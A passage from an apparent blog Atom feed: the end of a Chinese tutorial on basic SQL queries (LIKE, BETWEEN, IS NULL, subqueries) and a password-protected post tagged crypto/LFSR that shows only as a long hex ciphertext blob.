&#x27;上海&#x27;, &#x27;广州&#x27;);</span><br><span class="line"></span><br><span class="line">-- BETWEEN 区间查询</span><br><span class="line">SELECT * FROM products </span><br><span class="line">WHERE price BETWEEN 100 AND 500;</span><br><span class="line"></span><br><span class="line">-- LIKE 模糊查询</span><br><span class="line">SELECT * FROM users </span><br><span class="line">WHERE username LIKE &#x27;张%&#x27;;     -- 以&quot;张&quot;开头</span><br><span class="line">WHERE username LIKE &#x27;%三&#x27;;     -- 以&quot;三&quot;结尾</span><br><span class="line">WHERE username LIKE &#x27;%小%&#x27;;    -- 包含&quot;小&quot;</span><br><span class="line">WHERE username LIKE &#x27;张_&#x27;;      -- &quot;张&quot;后面跟一个字符</span><br><span class="line"></span><br><span class="line">-- IS NULL 空值判断</span><br><span class="line">SELECT * FROM users </span><br><span class="line">WHERE email IS NULL;           -- 邮箱为空的用户</span><br><span class="line">WHERE phone IS NOT NULL;       -- 电话不为空的用户</span><br></pre></td></tr></table></figure><h4 id="4-子查询"><a class="markdownIt-Anchor" href="#4-子查询"></a> 4. 子查询</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">-- WHERE子句中使用子查询</span><br><span class="line">SELECT * FROM products </span><br><span class="line">WHERE price &gt; (</span><br><span class="line">    SELECT AVG(price) FROM products</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line">-- IN 结合子查询</span><br><span class="line">SELECT * FROM users </span><br><span class="line">WHERE id IN (</span><br><span class="line">    SELECT user_id FROM orders </span><br><span class="line">    WHERE amount &gt; 1000</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line">-- EXISTS 子查询</span><br><span class="line">SELECT * FROM categories c</span><br><span class="line">WHERE EXISTS (</span><br><span class="line">    SELECT 1 FROM products p </span><br><span class="line">    WHERE p.category_id = c.id</span><br></pre></td></tr></table></figure>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/02/10/PHP-MySQL%E5%9F%BA%E7%A1%80/</id>
    <link href="https://cl1ck-t0.github.io/2026/02/10/PHP-MySQL%E5%9F%BA%E7%A1%80/"/>
    <published>2026-02-10T05:28:35.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>
      <![CDATA[PHP&MySQL基础]]>
    </title>
    <updated>2026-02-17T12:27:44.217Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="crypto" scheme="https://cl1ck-t0.github.io/tags/crypto/"/>
    <category term="LFSR" scheme="https://cl1ck-t0.github.io/tags/LFSR/"/>
    <content>
      <![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="❌ 密码错误，请重试" data-whm="❌ 文章校验失败">  <script id="hbeData" type="hbeData" data-hmacdigest="1bd8fbe698246e036f66a86da5bbb0db5cb45a8229937599ad11a7cdce2aa6b9">64f048e0353e85661dde1fbb1e4bc9a51c6c1ab34e55ab9e7d6c3b8deb65f523c06cda1e5e7ca5a43cf30ff0f88fa0f9e1268e4e0c21fce96643de82bdbc8fc0eee7957d51e65f0985c5f4028722acb1ba5080b48aec2c647ffeb72d22d9ec969d181a6f201a72463033706a6d24fef19789cb5a591748112af59366db11e81cab0a166f0cbe62a6e1e3447b7a6448d852e10406e1f6d0cfe16d50a9a0357a5bd727c6f0d0df14c2963e48f4da158526ed45c84839e18dc9fba694e666410de3173e10eed15811c24711ed5def85cb54fd3647435b90a7d5c319e8ecc23c8cb2346741f616f38dcf1943dd89add2c0db335a5554d1785253997fa816c2323b1580478c18556f5716d223031b4895458e2b4a934e7db7eceb1224771a2619c809d50e20bbded60275ffab3d0f2181d3f68c1b8a544967a41ba19afe26cce2a3c78202e74d9e700792d99c4735c67d39c70146021fa8fabd4d9938231511880786abbcff00ac73fc42e13202f156b62f5284ae5be52c49c802b20ec6ad027a66cd8b41fc5f738f3ffa97d066cb07db71f43260804d994e53142eb53784758259fd1783ac1b999723b700074864a0f768e2d1cc55ec8c77df719d0201a1044ebb7290c372ac6ee983fb48b0bb2d0f28edfe182915a88ac7580e2aabc7339a82ff25e2a8b65d75e0f2fa7726e6bb30d8e12384d2fcebbf051be8117becbb2accf3037985f1f22a80d7aec7f041718073e26fc8361664914abbf97e94a5ddf1aca524e1663e3b37904042748dd7994ccee0828558354cde0d4d45730c684fd7d8e3be88d02c3e421abb73a6faf78d472e40cab6abf84732f52f8c0a5c99a4a8e41f92d326db256ca713d49aec3ea93b6a2bef9307f10b5a3fe14df20e2201e426d9669a485ef594605f0cef3b05d81767f1b823fc7d9a759849d1ac1ed5b4934ba6450a41354aafc2f1736a11ca51bfabafe197b8101ae53d2e0a93392ea68a7fbed69b0922a251ce8dc066e0791c925b3263d390d5e71f42c416f5428d89b3e8daee602184ea72c73f585ce7a068a2f818cd4c71cd207c335935b9461f181b5e4a286f50fec37eca9faf8869f2c0e2b570c428b55f4f45e753bc864e35ac8f531ecafb08d1fbfeec2866108715edb1506b453dc6019894873c0e29cf96516e4f076f8ae24ad60486eedaf6b0056a7ae8c8e6c979870af2ae0fde88b61c239521a0c68fcf65d8f4c112a9272daaa938db88d4f540cbf60edac5d7cd4ee6a54eb99bf2ea25156095050312fd19b5447d01bd1faef95d9b3c8371e0a4ddedfcfa6393707f7c74b94d22cebcad49771bfa9b69a45688d5d12393078b642135edf68f5aae0d29adf42dd6d919f599603610d63871bf7a913defdc6af0b976fe66a9520e02aac3c82d9a7c2a34f99a40fcdfbaafdd410e390fd55fe31ec2344b2b5a3bb4775d64cd447dc1aa66b089c3334a670e1d722a7c875e6a2f886d182e031765ab5b705cd83a895bdd8b01fccacb18d2d4f7cb3771550c1963238959cf2985e1a53dfc78c51ee980e53890df6c3d826607bccf26025889c9ed1eddb17a5f02bf538c640ce6b2b2a934bd14890fe3baf3a044f0a3501374f58248468191d9a9e65c7696da68460f0a7794570d0ebda88bb9b33197af8aa95ce9c817c936ddff0cbc8f9735dccea9d5d0d7c4c460314c66d8a36c141d9f51fc66fee1a13bc7d6ca04125d71c60670a3a56a364be0595e38f10b3f3a5938c09134b38a079faa9b05bf460f3664974a22c6efe9293399735a399d080ad2f78ea36520c2744397d4e0258711de98901d6e835ba46cf361c6f78cbcd2d7cd073271eb042fc311758d495aa69200109d92d2746da9023bdd4c942a501b69c81173cd964d0f7ca39726e0a6e943f819c55c32dc3025975b5f16dd213be75fb113a4dd4e349450bd6d62bf62706ca1232e43df819f34726f31d2f288edba56965b92f6456087e9b5af3b1cb9ce4705f63ddaa67ad14349d18a56b85e8931380ff86f88f1ebc8c620da23788ab5570be58132d2e278eb9e3eb04bae574588c8a2be13d52be29b7c16d7f420308dca736eff53f8c5c9d82fbff7fd5c3acd717c82b58491ae80b39e467ddbd5f7fd1c6c07e128c6e16b8e97cf03e8db433f139558ef2c01b518d451a49fde5b5bee2d98fbebd9c53ce70a757e76b7451cb9ec155b6c87aa6561974eaa4d0b64e4e5487fba72b9fcbf116d9ab288ec6a1e41717315363a241c774e0b3abbb31afcefde72f089b8339a68317a690819fb1de0769484bf5592789605974ed8778b91d74cf325859cd26d0975efef1604bde8dc7cf06148c2cff59f46b27af2001829eb5724b1fcf7099f3519c25c66210dd0cfb8d5b90444ed98803b0e04125bc1468a921a685ea4b3486b666c40112e8856f83dc3794a7e85367efaf04047ffccd0d7fb783e11d83ac2faf3e4fb2c810508825642e908fcb56fc9f36b8b1a1e518ca3c3fb4459602fb4512d1b022e1ebcc970998c3e66b539384c34d692923812b91e039a28721a1b08016cfab6a47a16277aae362a3ae6bf99b34853a97be21eb116d46f16cd1fee2224ee998aab33690bd627a3705389a9c6b697975bfece7ed237c4cc58cae0a13071a328aa3ffd0fb2f89501a968a202ff977a4ce661cfb4c93fe0d639ab71648793b1f85d3875b78127ad3cfff51dbf8fa7c0e91f2ba2dc2de78a1cc6da191ca6b713082c8b3bfb0bf1e919a88ee8c6d27286e05cd67a2f5449d2bb2bf35e9af5b1fdcfa47ccd2d92a8fec8268f5be38b371bc9c7ba84708159cadeaf08c6703f1ed5b6f45b4e9a21755370658c7740150989ed8aebda294037ff65417f1fc1f7e4d639b0eba8eed4ac1330e715f34d0803129b2ef8c73a465770010211b66cadccc6d2d0ffe7b3f83f2b8f06b64065af2a4a3b106c03fe08d2ef2ad179ed1a07dbc1972ad69589c2f7673c7931d59c9cf04b09e11d4899a68b50b8c86bb68ea447c172a3840426500bca8c29172fbb3a51d06bd11deba1460f6d61ac9d5767362e8afb5aa2e32622629abe194494a23ce5d32d80bd52c0950cc0e698e9d05ee3edd713629ce5ecc5132de3fd60a842f2494e9d40b90203645cd7068036c5c2e7fa056b71307a4189b6664443edd7d6690c5fe57b3b353d4a8d78cca5d0df8f855dc3acfd41686ee7ae52ddc25fbc70695cb5b707f7c536dea651a1b60db4bbd3e400544c0f63ed5afc01b50958e85e90ae2a86eb9dde9107598cd0c83d35c715a35abfb6247a594daa82482bf6b78e9603743853338391127c1b9ce5f28f9cb37ba7bcf087ece247d2c57b05e8fdd108c49d8c6efd41074696d7dcce8cf2ec352cb434516153362a2e0a847fdd3bf43ac462d974ae35aedc9ac490b2057f2dc166632053900ee14fed549b54eb360c1dbf5222eec8feb38060390ee7405de8e95dc20723942f29edd52844c1a04358b23e798e4aff07b1e179c99c872a567f66fc297b901e84b1d8100476a326cb16b261c6f1915022a9e2a17c1f55b1e4945b088b06ac3dd238d4354341a8c5c6233ffe3269c0a6d2d048aadd67ac10a2337f3e1ba58cf1b3000d44b1b3633274758573db87b7209aadd25f8feea9c5e3c3e8cc8bb2e607e32e45b02e401209573df80878ebb76af68ba0617e9293c7681fddcf5298ed0c1ef33f2c86438c25cd798b6c0be3aa40d6018b7833157dd1574f30c8e47e09fd440ea650d6dc542ce455374ffeb2766507dfb446d1df1b9b601d77740d0bd6c765214841fe706bc74a9de87fa022276aca726dab25ac5f5ed487df6301db74d7d18e6b45d7de7ed93b8a2978300d967d4d9fc244acdfb6a40e0c71eb35e04c8d38dde44110444db4a220454f805c3ca9398ba367c65ea1932e3dd71c62747d72aa290fd125d7781b04d1f4dc8af47b9d734178128bfef05fb7bc92a05960da0377ae8e44d9150381a2540d35a3a64d3615a8e4557319b436abbd9310b4e1c6bb3216205a8e9e23578c2356d94bf6727fd23284c0073c59930d220755b834fdc6740d99729f68b15a084a8187ae2bb1ae65ce7333cef9a91fcb19a651697d6378e42bcb9f3c252f0125ec7624893844ae323a0a8c26deb911c0aab4d667759fb27ae8d54b643829b7ee2827861611ea5c56a12fc0555c9c25495ddf668e6dc0c140b39e57e055c9260c06bb1265bb842eac3a56d9a7e8a06b1c53e41e6cf67ffe987bb5a217480a229ac1b06faf63f845a4bb66fe6f0a113e878b4c2e3d9afdd702bc685ce6b2b63c49aa498933718149c0baa6270e06be84ef8652c6bce64de6fde1f8ce512542dada719278d9f851a5229d42d78f3efc6a56a64b7e180d15c165139c459ca668449a1b4809b7c42291d3689a1a6d37d67d8ccfaa8a4d6e73033d4b158148aac3bd498ccf28f2376bda33a697db1a56398ab6c99238d50753c2a819ea9d6725fb8c04658b1376d7b0ace7e362dc3ba0fa03d66adc673e3824813227aa2d314a2b6496282510d02935fa2a9f1ee2c01300f6be6fea97e75a5de1cc327238ca4bb400d3d95f789df42873e1c44d5ce9e729902c707237aefc8da7b01e21ffabbbf43839b31857c8963175ed1f5f84882596536a879f888ab6585ae1b344ac7a93710beca45b533100dae9056f91ae20570643930a92833d9462fd5412d88f7325361888f217c45e79bee0151e320b417b9b0934804d57a10524721e3acb12085cb1725d9c1e3608702f148d5b4ae8ce39bd08f6ea3918e0a2d22d862eb9a696d9d05707f452cd809d69e011a5cba6637998ee875b77edb12458c4c16d06c5034279b5978fec85d652e71e25eec88993c825d17d0cedf37cd20585f4298ea06472f4be5d85da674f9ded8441369514ee2d3d4e3e847578f5d19242634395d6386254eb748c4728e53ed2b5db104fff2b0602b3f2a77de559ee003a00a8d9a4a140aea4879d9c3aca0c35ca10d0dd273f77f85f1629663c67ef58eae23b371ebf5faaace9a970e847e182e8c24973afa9f8fd4fa25dabded996f0b073bd7ba9e823f94fd3f10e5f6f819acba863b03ae8d1ed02dabedbf6d9d64919ddb800d8349a1a25c42265d5d01567400b2c8500f6dccd079e19f0eb93507caa6d574d937830c83140f0b9e38b3efea2a3ff74bf10e2dc6bb6731839c37c306ae74da52883423fe3794944e16ab20a95ac757185a4bf138d024dc80ebc333c8be6b2725ec2c7c9bf9778203d721ea31dbbb37eff7bb7fc8e7d63fefa4136639c33006e8a3da561952bcca8eba489b4b1e4271ceb2e927e87898057b0c15d1119aa14ca9c1d6c49bc70092c984e843db3956c38ec015f380e15330108dca07f60c590145b0bc5737e63ee59d4f4010ee54289fe70961cbe79d198703ea678c7144d22c7fe655259de47f6253a6dbfe8ad370b8c8188e69953e76702cb6910fc7434445c0bb7c82ac7c605c1be4227866aa35c88dd9e83feceefe6affd6fdf5d2be2299032d5d0e33f2909eb318a52ce2ee5308a48a759eacbed1fc83933ceb86dbe1157dd00d5d22e5b9437a1f781633ddedcfa3ce59f77d470b8f46f943b8edf4803b5bd61b0546899320cdb930fe4cafa73992e184394a47c0c9e4432411ac11f8ed8dd7d27f9a9147ab417477f83aebc42d441d4cb3ec46d3dd63db0f72f28d6b533a511e5e6a843df623702be756d766d587587f9e76f76459bd84bad0d2d2b3f36e38896e32df8f1ff5896179380816f0200575c07275e2b10e7543637ccd482d12d3f6fb3587766c2665ffbd0d3b7d9fc8e547a77836a2b6ea5d857f105c2b989d69d42aa83945eaca071122c2da453ee8d8a1ee244b4ee8685a038b23027408909a79c682bbc1932f3598f2e48a1f6ca0a6fe16fe8fc40b6c261ea8174880de436b6a8a28caeb857616774af94588a355b79db576c0aa4451dcee40a8d21fec0398f9490fdbb706da31bb0d55f6aa7c227b800dbeaa37733cbcb5f513e691194015541ce5582fd5f1345cd3a2ae42620be8866ebec3a8a91c71997504ab50f79f4a99347708edb9daf44314daa1ad0308a4347f384f494b3c50fed7c4aac5d64ed3caec844851807ac39ece325475b5b720232974cf18f13cbd3db70afd95f67131d03c5fcfe5eba13111ab255024924f8b755a6f42ea842430197ff61207c311e3f93cfde3c7ba3b51a05e19a0d5f3a3776539bc07e650d63b921fb5663644c3656b7eae0b9846e33489cb355e0f9cdcceefd79047900fc5229c1368326b07f8de3dee3eaefccb27e1f307ed37bf7f48579aa6f3365010dc5d740923625b5f8096853434f71cb9c5651837b597db656cf59548357e9b0bf0b345176b7f5a621ed7ba061d8b7a4c0c28ef56c6c8ecc8d268db047c2ef88119ea05733c3a1453b9514d4dfdbe975cd2a3b36884cc8fc79dab80f6ceda8f81078ba0a75adbbc11f190339a8fea4f0e010d88be5815404bf4988e76caab3453b22910f8fc21934d94d4f96b7ff33bb7f4e109eedf6fd9733bdaa398c3500bdbf13e7d9a6b56fcfcaed5a190219a9ae58e23da552cbd2b825a5b450fce85d1ce42c73612c62c23326f826a58d6061748ce580878f102d4dfe83c276b94cc22baeee468f954b85217d43d23aef7175c0786afe52e11a8c5d514dd1635a1a11c98f5c0727d5252977c0604798ba562f716cb269700838bbe50cd646438fe30c6fe32c5d62d4a24c2e9d0dbff87690448cf125ee2c99f01a72916973696f9b7acab5ee829c09272c844c99b5b3363294bb28787e1605e38a183a34c0d8cface395b6151141daf5515ab44955fd50e1fd25a2a7eec24dd21970a875c3a76ff960096a1b0453f460d6e74aa9f867489821c1004c847d5acd543dc8a42a8a1435622c91932047193899a3ee2ddd06942a5b6d46ff7ba48abbf4fb59bb9f018048e2bb1caa9e48afca5b5829dafbecdb429c7f90433fa0b6e5f8d064ec2ff9bcaf647a7189789363f067efd6011c2d29e54aeedbbd5348295ebeba99e6c31a3e6b5cbfb00f6745b6c65196812b0add2e2c811afd1773a93047f45f885bac0d556c33f34c2ef09121fc1ef5e3d87c53e35abbeb87d4f00dec303f6edcc7443dcbe444fb2ba276b00cddd0971cfe3f7ad9cf29eb86714df315eef756b8a4cd9d295a87b095d7c284cc37a31b6d6aa4e57ef3fd7b8000aff0b33cd075fbeb841f8ec7a500f0c9ef9256190ea367ac76b9b901e92087d5e40ffe5f87e3d3dbfc7c97be6a4dee97a6ec970be276d8b96e085d0406b09e2ed24b5022fa7536f82bf1bc19bf5f3e2ff736884a1e99e430de2637928f0f41fa3010b1e79ac4d6b16553a1892afbea0012281b5396c5860d1aac0fd5edd6617c23c6376c15236cb21e5a3ec1bd8cbd7e404d02387a8823380df6334c18bc1088452a3a9bc89b9351357e499ebb4a659d73573b54abdd2175a5799763868acfb3ac727246228f1882f5916bd8969a4232780d7c5993f1cbcbc5543f1fff65c3781ee91c9e94191e725b250447a25a360629615325d3e4cdc41435a2b0a3fe17d2150e76a4598af3a2f0579cc9cc05e8018e65529fecc190e02b1686e9c18c3618e44beb247d6e37ff0b969108f3442408dff7eaad97733eab4fd7793efc24704bf35c6a0731a7d8907603897bd94c50c258e768b4eb917e5e93635184d65df942a8347b45aed8c52e760848728ff3c5d901ce7980a15b5df5e3529621ffa50627aa5834413446ec96aed651764ed078ec5f3b1ed756f81df9f157de810779c6002a314490118ec7059ccb9ed434c3d82f8887eca5e8d713630d7ef9b4668b2b864228e8d79a1f36e4e6567f75d5874bc0150eece909a3d34b05274888c560df149a253ae7716158eb5df617ba52f565411e30e831977023c5cf213070be7d8c8eb17de24e31857971ba3f2d2d279c675d4c2aee43ed58d4b102ddb310204b2ffb4c18fba48219b39718ad07f83b84c1ad3d3773f8a43fdbd5903738c9df43f9ec08b020b941ae05f7593bf1a3c3e116fa202d07b935dd08acb3ef076655c77d77be90c6e2164469e4e834e1cb957a7f8174486898c515404f2c29803a55d3b5ba06af652df887dd293aa45778d88df136b18c46802a49eebdaad68400c8b04eb02582f58cd336d83883f552a4949127caaf6bcd3d7ae3220e21963df1714d1f271e9465b15cd73155da3bfa31fb29cef7f28809c7984800593409a04915d654e72539ada414a44e5f576e650b5d0f6aae08c8be86956b762d84e546ca99df111abbb1eb580a68c0c4cde8dd3944d7bd8762e50514492ed9cd46475e03450a767b0f80eb7db38301230f61cd3ee005e86947d6305fe0444814823c9a91382c46454d30bf4b78ca2afab973f244a92e4323100b8da2d4f8c70611f7c2aedfe58efd897e66db4ba7631a2ec3491153c1acc8b2d4fce7c62c94fb93fadf4f0069cf203e7c502c26fb156e75bff74ffaa4cb4ca39fc29d7c896db1d23082087786c819410679177648871aa49914700e557ac1e6af44fc2338039c738c4e01f679fbfe540083a11225866db1f9af93324f55d95a8b8b43ea879694d6e2a59b705670a4e54283fb36b54aba8787ab37b21e726db500612d7211f1c208ab52caee54cd4568d0edc830bd7b8e7d3dbe77435dcc8a8cf6c0c84238b7e8ac04369e93f89c461a70188bbeaaa781d28825489ad811c2baa76db793b3051edcfdae178819bdf92c6de3c62987f38810f30e8d0826601cce610e33f976088d235e9aac20022402a248b9af7443b9eacd888a1bd07e2f80215dd7cbbc1645c134e9ba330671a69c9cb1b696a8b65ba316959b8306bd231ad1447193254c5f97429124f948d40fe1e5d8542719e13046698cfd6225fed9c3fa599139cb5414c62bde25f117a75f3e4fde714137f025fde00032eed309b3b99e9d13bba048b0bbdf0dcfe7698f96678a29233858bf69037d12f499938b735597713d58297b60f0518406cac6880eafa674c6fef5e1e1e5ed3afce9d47bd06f9d12a2e53d799aae993d308c77856f249128a468b6ee8f146566d64c5897b60c080b27670c23ae7d3f4c1ae5101af5c29cdc3dc970ca25e36a804198ece7006871eeca66b808b599fa4e2369eb089c369ec84cfab8a48c9aa805def650b4b62d98eb835a35f853e31c4c0e01b38e7491c298820cda17fc7317973a61186809d99d6e2eab73f1c5f7ca8cf914b8d4c6d6f3bd8cbe19b52c97c39fef3e380b1403d17e59d7618f801803ae4a2e6098f88b10c98e44794021f2ee3955d1e9e218606a4887195ec8de6f74baddf8b4c1ab741e3f61bfd1fffb52236527db0f543bb1aafef62f06b2e3e99150f2e37c8df00bc4b683305ff4dd24e5e22fbd614adbfa1a65ec80314db6cd843558cb045eb24e77aa399be44e7e6421ef1f46ad780500e085c4805a737686afac98e307079d2301af6d5ae724b91923eefe389ca298ce47de6fd4427b498d62c9864206835303373b7ea8d2c9be662a3fbb80367f1aa46c84699e685eeec623b963d8837742818f70aeac5c03a7e1915fde08d152395b517baeeeab2ba409ef8b6574aaa2fa62fb755238756c81fa94e3859e2916a0ad11439a5f7c6cd8b849b9a988c7f2e34302d2bcdf6195b02668f32f1a81360232ff27b32445cc2b859d748b5a065ab6d49405e32954b2adc5872bc873be4fc12557b1508461e55b4182cf4474cd6a2782383811ec738b9dce20fdeaacdfdcba07ae8cbac7a195a0f61a89444ef767c2467e5711861d4b2b5a194686653843f13e699d8b4f823a5ef574b0d3bcee639ce636efa9d1022027ee195918241ca2385a04fda404803611bd78a97ef89b6f4eb9654f30f211e77598bfd99d8624ddd3f268ed765ffd820e003d8002dd5a47286543d83f4722d5c9e566e04ac30d4d7e4b104575b3164d3144e28692effc707130012f514f2483e33d499842c14d624f519e68901fc3a7eed27c4e8f5a68970437f139cf4ac9a284160e0f4b5de014ac78b9576df2ca29882eaaf1597e2418463e868cd51e7e7e139cb326a74fad00519fce9fbc6359c3b60245fd3c8f57e2ffba08a40d7b463b9a6dc4c44d89d5dba1d435907aa17f8e6b14a54736b3c7a0479d0fd993ffed6c6303c7238dca59f301902d942a116f07ee5cd9f845f52bcff9f73a316a4e0fb3be21042b03e55f201bf1f37e68da11e65dd482a4778c200af49650ac3626ee434f06b01a6240176bbb94e49636dcf786c43fad05a0c6d9f589896826e5af44d4d7a3721311eca1253d742c8e3f1d358263630a530f8942f4f2f824100158b96727f42efe988e247281ebcb312db819fe32bfbb7e71de508b263e7fc74c2c64257e9b48126b3aa098ab0e9603ac49a9c679d211bd7556916877ed2e68653b3ca0e3374671f00e37ee4453850b6f1baa59ec2c956fc1d62c7083959ab4d642e92fb2ebb86b8b2e0654a0be2a16e79b512fca225a69d68ddcaeedd3e9d2393e2437009b6457749f403f0f5787674f8d82b1898c09a70f71538a2f507aa57f213b8c29086c83b03f527d3cd12630434b87047ce7f64ebc9608d7fe682d132d069213560086f077550fecca6842bffbbd766bc99ce8fc49868afeeae557d7f1eaaa12d80ea6428be60ce7f4a7b59b029b92e093c0dc80e13f9d623cf40e33d08d955a080011d5c96081b9dd49297e02cb945a47cbedc72438031801bd92a341b4bb5d5f9a459af6dc4b82af3e8807f7052193265d45d09453ba4641c8b87785b061b9787e70d1a6eccdddf6a7feb20487bcc0b907bacabe289feda2300b5c42c5caaae555afdac5559a6795b7964ed32b749cba547c398bb2f07bd33f81abd1ffb14ffaa7035c1fdad9cc9a44e06334ea5ba801c45e7f70d1aa1d88e753cdc663e948eff7524fba7632ea8db4af7aea75e664b2f074ef47763abd5993f8b6dd93a902b1163832dc6439247f8aed1dbfeae1f375f7f02b49c4a12a559e82fffbfedd5cd7c13385a35995fa1b52f4338d03b0bf841c2a6046bd6038f84408cd785e8c0db6a4834af0d5566dab9cb48685fe0d2500df00b79cea9e296fa36359200ef455719c999a46f9b333a8179933b0167d93575d4997101332c95a75b5af235b02d6ea32b70d78c1c9ee258bfa2e2cb40d915c1bbe60c0de9a865286bdd1dce9220eacb8ec82250564efa5d873ffcccde10b19afbe578e39b1bed6f998b3216281e738ebad60120497f109a544fdd8d44d005220daa0eb013eafe985e776d575b3e3dc7f12b0e0f89f828aa68fd081fbd73436be51a79779f0db7938f87dfa061e339391a6e0b752122fa89350b9e4d83122fb2c0e399e1ad35660a5f0e522e08ced9ec8e5cd3ac61fd6ac0f4fc23f5ae770218474378ba61d2027aea759a5a96d4d8b4d42713f863037244a4aad11fc3079d1f968577754ada1043b1ee97931bbc1a1c954d592f89f2526966aee754cc5c64f4ed3674374415b1a474277bc2751d5f9da16e726501b2c7c2c9b64fb8f26e1aecddc2cf9a1f8ab91fc1fbde9a06e798c2d998beaaeb5afa07c03ded794005eee99621a044d94b4a7029bb11483a224b3366fa2fe98cf8783706de7603a0f9f432c4e9ebc43d941579a3679a6f5689ab1b29692dc9924178940ed64019280fc7bbde21c6a90d0b02202695af7183535c5fe4159ad79c737b78063bea33ec81dbee11118b4442dade206f38145c99f3dca2e27a948afd2f48381781466692950013f27b718a50b1c84c58058c1751010ed8a267f57fe42402943fbf3f8f3bcfdbc0e41151400090658dd47acd689da09a10d0df0ff545104210033f1cb612bc413ba76a49f0269ec3bcbd23b4eac6b35c1165ad345ed8c9857bf76ba8f198309bf569476e009ae077b935fc93897fc0fc024079dfe6762cf2f2f4e87ef6688bfaf22bff732afa51fcb7979d49da3b64f653ca3dbef70418a6df7c4c817cac147639b213390c0babf208a3a82a5d2f85b58365ccc1a038397f37b1a6e2d659823bcc39adb379c420c077db263e49f0b01256ba28c1e10d3a2cd82592892f43e378ddc96d3a0e871dbbbe704568d4f3f19c3004ac96b79c605416f2c0eb72820eddba8b8d1e3276a12501f1f14d3e61ee620214a57554cfe7b7fafaac4a7f23cc8557cd36b201d7faea7ed897b076092bd92c131a5dc8af797ce673fd12be831a8cc26557fbf911b015725e01635709441e76d36a98478f5455e698c83069cd3df70af82d63f4bc28c1f4525b2472010f50e227d03149fc0fd1f56d3a0ec50c2718cb6a9d04bbb3c76657b0a4862460032082b28f2ab12361ea9b8eb29b53699546d1545e87fcb445bdc89f4f87938254b646bfa6ed90262a0e2226946ac78f3a946e22e8b9e64029541bc2147b4a61d6ac40826be8ef78ea7ca2b5a48bd269e955d744999ecc075afbd6c4f3d1f50e5b1d4d30e24f3b81b0e53b292c30a78f850838ba09397c8c01c5512154f98f9e056c6e30a45040d7eaeef12e088cef2a93340e36ccd0ae53fa8cf23db78c91b6f39689c24449fd5bbbaa9a6b0f8b842d8d1e5937d0e6ffaf3711de5665511114670092b3620d331a451263bc56eee590a40b2c0c2444ded2979bd972564d8228409c3d21efcb49ac2e2386b0ac2dd26bfc9a800f5038a864c6f8d8b775d45b8219d349a2cbc772d5589ed02476bbb8f65df99499826747042728a8e5b15603e62f13a35c82f9d29b12b67d1d87312f23c4aae7503900f292ab224036642e8b8c44ac77e74763b36dfc7bf4d8382deeb35f92fda05cc788cbfdace92d2bda0f3a85763c49f77e82f075de8d2dfee38f4908c1b02710d151a4e60cbf657ee41c3308a535ef29d322be774bb9848cde859a6496189f3052411b9fdaeaa65f3e2355eee45bd5e8875adf33c27ea0ca57face1749631a3b78232a472097a126c9ff81ffd6c466ba0d89c3c5f28a845deb9a2a0ab7b6993b37846b8a35763b7d477f6d66eacc3ab9c507cc3b79519a9ce7ef9c824af6740f3f0a7956678c4b227fa86d57cd9976bf54fed0cf0d3ae3b65a01b64e4b8c6286988386b7926b5b36951ee77cb0cbadeb68b74d38920f44a43ce8c0be99baebf311cfbe8bf6576615d0b8a17dc9f67ac4f8927cdb3e8d07a77015afc8df1d96663c7ff4b7d31b9639ab56c8eaa437f11a660375520c24b42f6af2109319c451982aab29f93d8283641772ca61033d9608cdacfad2de5de0f54d2786e38f956ed541e2ec3e60f50b701520c02ae88adff5c77378a928a4346f264cf026a5177e15e8ce0400330fcce1fbddde88c78ee0cb0e6cc49d3ecc0e68e9fc64295ff069c29bc72f4c4af71dd601517475655edfd5f3c4e180433c6cf2be068e62b20fd480f3764298c30bb375e3ef9ad9bce43c244305498a0332dd0750e59a10d1936bf7e34ed80cc865e844f04a13c2aa1bc5ae04a0abcacf7f19bd790dbcff34ef798add40b960f47f407abeea88751a2f94779579f88ac01cbccf10876311c8e868630b9ca2c5f4b198d3db94795de5d3b0b13c1b57a9c1d68e54614e180d9ffb3ef6e3a519f0dd8c7282c5edd4e773b6f6c36b0c8a00dc894d2d58fd311a2ca1fdf4b6e28b9f68ba839542d2f33b308374c8428d4ac70c9ba8c61db44daa7c3176d0f7742016ed0fd5ecd5505c37aaf0dcbbbf18fdf3b87c0f48cd123a9ee661d799a6666b238f1175a959bf103dbe5fed986180d0ff0a56ff14d9afa5ab51f24bd8466047fe7203e9c244469246b1086a3595bdbde486115949eed8f48999e57c14db697fb9911c6cc6c65f62ad654a9acebfa40e6511c0d8133a1b4c515a341fd04e14ac667e987db386990bec982770be3f37e6dff99c8c2fb92ee16802b3d9c65b7c84534382ad6028d05141dd787760688ec0b7f04735bad095f5b6a3bf19ea52f0fc5f12a6202915b7798140a423cb70068f4cf841c3861515c6fbab04c5be0a1d795bc4b8125b8ac4b14db6c82718b99461badd5ba17d2cb0ce4fe4b17076dbf6a222eb1d12c94de21427e6a61c9641f86c82945dd4c8fb23b7b0a780eeddfe3bfdbb424a5ffc5c6280bc18a952bb1a75f80399b099dffea448e9ce2d073ab251b7fb61be2b99f58a05e14da27ddfb6ed17d6e405cfb03e14951eccd80441aebf63106f0b171330d34c5cb5d9778197d3f30de21708a7d0a834c5806c4f07d846170225297d1d745c2398872429eca992157d0e1ca6c05fc9f14dd984b5e6b9c708f9147fc3b407a4da415500b51b70a9198cd037d4eb29d35c1960232ed9abb31112b9093afd2143707df9e9e819479cd72dbac08846706cf1af6afaf94fcca36936310c56ce5855c9a65f9d76c93d144e96af967bbc3645ab7386ba55d49b0e4d77146e29f0a30703b863acdd986cae3ebd867e9928d3994728b6e5172c91c941c4c0648fa96d41f02da71e4755c0cc6e65361ce5f3ba3281a6001ed71dc9882c173374ae6a3b6d5cb0c562a2ca578ace11195dab3a9daf75dba1b55f94b